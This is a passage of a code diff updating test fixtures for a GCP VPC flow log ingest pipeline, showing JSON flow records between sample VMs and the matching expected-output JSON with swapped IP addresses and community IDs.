+{"insertId":"1gq7q7afe373ew","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":56478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373e9","jsonPayload":{"bytes_sent":"64140","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"371","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f1","jsonPayload":{"bytes_sent":"231764","connection":{"dest_ip":"10.87.40.76","dest_port":33694,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373ff","jsonPayload":{"bytes_sent":"107878","connection":{"dest_ip":"67.43.156.13","dest_port":65276,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"614","reporter":"SRC","rtt_msec":"156","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fq","jsonPayload":{"bytes_sent":"595838","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":52430},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"299","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-samp
le-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"14iipwlfd8t01n","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":56410,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"SRC","rtt_msec":"37","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01j","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":51950,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01o","jsonPayload":{"bytes_sent":"361966","connection":{"dest_ip":"67.43.156.13","dest_port":33876,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"80","reporter":"SRC","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwor
k_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01p","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":51950},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01e","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58658,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01q","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":59924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58658},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.856250208Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:50.733935895Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01k","jsonPayload":{"bytes_sent":"123732","connection":{"dest_ip":"67.43.156.13","dest_port":65272,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"618","reporter":"SRC","rtt_msec":"123","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01f","jsonPayload":{"bytes_sent":"76342","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65273},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"710","reporter":"DEST","rtt_msec":"115","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t018","jsonPayload":{"bytes_sent":"9761","connection":{"dest_ip":"192.168.2.73","dest_port":45224,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"end_time":"2019-06-14T03:44:23.955039461Z","packets_sent":"13","reporter":"SRC","rtt_msec":"242","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01a","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":56410},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"DEST","rtt_msec":"37","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t017","jsonPayload":{"bytes_sent":"51612","connection":{"dest_ip":"67.43.156.13","dest_port":65277,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"615","reporter":"SRC","rtt_msec":"95","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01m","jsonPayload":{"bytes_sent":"74330","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65272},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316981133Z","packets_sent":"745","reporter":"DEST","rtt_msec":"123","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403442252Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t015","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.13","dest_port":59924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:08.213471928Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:08.092659117Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01h","jsonPayload":{"bytes_sent":"76622","connection":{"dest_ip":"67.43.156.13","dest_port":65273,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316930467Z","packets_sent":"599","reporter":"SRC","rtt_msec":"115","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378287Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t019","jsonPayload":{"bytes_sent":"42","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.168.2.73","src_port":45224},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:24.922448897Z","packets_sent":"5","reporter":"DEST","rtt_msec":"242","src_location":{"asn":4847,"city":"Beijing","continent":"Asia","country":"chn","region":"Beijing"},"start_time":"2019-06-14T03:42:23.705320616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t016","jsonPayload":{"bytes_sent":"75263","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65277},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316890309Z","packets_sent":"729","reporter":"DEST","rtt_msec":"95","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760385211Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01c","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":34646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:10.529592195Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:10.413494375Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01d","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":34646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:10.529541195Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:10.413397239Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01g","jsonPayload":{"bytes_sent":"5044","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"87","reporter":"DEST","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01l","jsonPayload":{"bytes_sent":"14132","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"91","reporter":"DEST","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01b","jsonPayload":{"bytes_sent":"151213","connection":{"dest_ip":"67.43.156.13","dest_port":33574,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821129119Z","packets_sent":"68","reporter":"SRC","rtt_msec":"509","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.468484109Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} diff --git a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json index 8e8f54b8b32..852d0346b78 100644 --- a/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json +++ b/packages/gcp/data_stream/vpcflow/_dev/test/pipeline/test-vpcflow.log-expected.json @@ -12,9 +12,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 33478, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -28,7 +28,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Eav+HA4T0zQk7MDzMdHH6Hhsx2A=", + "community_id": "1:Wa+aonxAQZ59AWtNdQD0CH6FnsM=", "bytes": 1776, "transport": "tcp", "type": "ipv4", 
@@ -43,7 +43,7 @@
 "related": {
 "ip": [
 "10.87.40.76",
- "203.0.113.12"
+ "67.43.156.13"
 ]
 },
 "gcp": {
@@ -67,8 +67,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868368700Z", - "original": "{\"insertId\":\"ut8lbrffooxyw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":33478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:37.301953198Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:37.186193305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subn